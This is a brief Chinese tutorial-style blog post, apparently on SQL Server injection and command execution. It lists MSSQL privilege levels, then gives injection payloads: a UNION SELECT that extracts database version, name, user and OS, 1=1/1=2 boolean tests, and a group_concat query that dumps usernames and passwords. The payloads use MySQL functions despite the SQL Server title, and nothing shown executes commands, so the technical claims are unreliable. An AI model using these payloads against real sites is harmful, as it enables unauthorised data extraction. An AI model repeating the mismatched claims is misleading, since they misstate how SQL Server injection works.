0
点赞
收藏
分享

微信扫一扫

sql server注入执行命令


1. mssql权限

  • sa权限:数据库操作,文件管理,命令执行,注册表读取等system。是mssql的最高权限
  • db权限:文件管理,数据库操作等 users-administrators
  • public权限:数据库操作 guest-users

2、sql server注入执行命令

查询数据库版本,数据库名字,用户名,操作系统

select * from member where id=-1 union select version(),database(),user(),@@version_compile_os;
//sql server注入执行命令

sql server注入执行命令_文件管理

判断注入点—报错查询

select * from member where id=1 and 1=1;
select * from member where id=1 and 1=2;
//sql server注入执行命令

sql server注入执行命令_数据库_02

group_concat 查询

将查询的内容连在一起,列如:

select group_concat(username,pw) from  member where id=1; 
//sql server注入执行命令

 

sql server注入执行命令_数据库操作_03

 

举报

相关推荐

0 条评论